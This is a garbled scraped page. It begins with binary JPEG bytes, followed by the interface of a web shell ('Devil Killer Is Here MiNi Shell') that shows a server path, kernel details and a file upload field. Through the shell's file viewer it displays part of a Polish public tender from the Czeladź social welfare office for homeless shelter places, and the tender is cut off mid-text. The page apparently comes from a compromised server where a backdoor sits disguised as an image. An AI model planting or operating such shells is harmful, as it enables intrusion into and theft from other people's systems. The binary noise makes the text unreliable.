JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241104/0057714601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych oraz noclegowniach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej w Czeladzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003450413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">17 Lipca 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322651442</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych oraz noclegowniach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-78852ab1-ed76-4ee1-8d2b-f3437056c323</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00577146</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00035572/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Udzielenie schronienia osobom bezdomnym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.4.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest MOPS, ul. 17 Lipca 27, 41-250 Czeladź<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD): e-mail: iodo@mops.czeladz.pl, tel.32/265-14-42 <br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzielenia zamówienia, prowadzenia dokumentacji księgowo - podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>a) ustawa z 11.9.2019 r. – Prawo zamówień publicznych;<br/>b) ustawa z 27.8.2009 r. o finansach publicznych;<br/>c) ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>d) art. 6 pkt.1 lit. c RODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: Podmioty upoważnione na podst. zawartych umów powierzenia oraz uprawnione na mocy obowiąz. przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 oraz art. 74- 76 PZP. Zasada jawności ma zastos. do wszystkich danych os. z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Zebrane dane będą przechowywane przez okres nie dłuższy, niż jest to niezbędne do celów, w których dane te są przetwarzane oraz do celów archiwizacyjnych, na podstawie art. 22d ust. 2 Ustawy z dnia 17 lipca 1983r. o narodowym zasobie archiwalnym i archiwach, zgodnie z JRW Akt, stanowiącym załącznik do Zarządzenia Nr 5/2020 Dyrektora MOPS w Czeladzi z dnia 3 lutego 2020 r. - zgodnie z art. 78 ust. 1 i 4 PZP przez okres 4 lat od dnia zakończenia postęp. o udzielenie zam., a jeżeli okres obowiązywania umowy w sprawie zam. publ. przekracza 4 lata – przez cały okres obowiązywania umowy. <br/>7. Posiada Pani/Pan prawo:<br/>a) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zam. może zgodnie z art. 75 PZP żądać od osoby, której dane dotyczą, wskazania dodatkowych infor. mających na celu sprecyzowanie nazwy lub daty zakończonego postęp. o udzielenie zam.;<br/>b) żądania sprostowania lub uzupełnienia danych os.; zgodnie z art. 76 PZP wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego zał.;<br/>c) usunięcia danych, w przypadku gdy dane osobowe nie są już niezbędne do celów,<br/>w których zostały zebrane lub w inny sposób przetwarzane;<br/>d) żądania ograniczenia przetwarzania danych os.; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych os. do czasu zakończenie postęp. o udzielenie zam.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. UODO ul. Stawki 2, 00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych os. jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postęp. o udzielenie zam.; konsekwencje niepodania określonych danych wynikają z PZP.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.3.U.MOPS.24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 499075,45 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część I:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych – dla mężczyzn - 13<br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2024r. poz. 1283 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/><br/>Schronisko powinno gwarantować: <br/><br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/><br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 156585,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust.1 pkt.7 ustawy pzp, tj. zamówień polegających na powtórzeniu podobnych usług. Zamówienie o którym mowa powyżej może dotyczyć całego zakresu czynności zamówienia podstawowego szczegółowo opisanego w opisie przedmiotu zamówienia dla części I – maksymalnie 2 osoby przez 365 dni</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag<br/>(znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt<br/>oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz MOPS w Czeladzi-max 40%(O).Oferty zostaną ocen za<br/>pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60<br/>pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt<br/>przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w<br/>ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby MOPS w Czeladzi–(O).Ocena pkt w tym kryt zostanie<br/>dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu<br/>schroniska/noc do siedziby MOPS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby MOPS w Czeladzi“ liczonej w linii<br/>prostej w promieniu do 30 km od siedziby MOPS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40<br/>pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny<br/>najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C–<br/>liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby MOPS w<br/>Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim<br/>adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby MOPS w Czeladzi znajduje się dana placówka, Zamaw<br/>przyjmuje, że placów znajd się powyż 30km od siedziby MOPS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do<br/>siedz MOPS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która<br/>otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na<br/>to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez<br/>Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio<br/>złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert<br/>oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst<br/>ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem<br/>najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zamaw terminie<br/>pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o<br/>wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp.<br/>Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty;-<br/>wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta<br/>z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę<br/>kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o<br/>takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ,<br/>czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg<br/>unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby MOPS w Czeladzi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część II:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych – dla kobiet - 5<br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2024r. poz. 1283 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/><br/>Schronisko powinno gwarantować: <br/><br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych 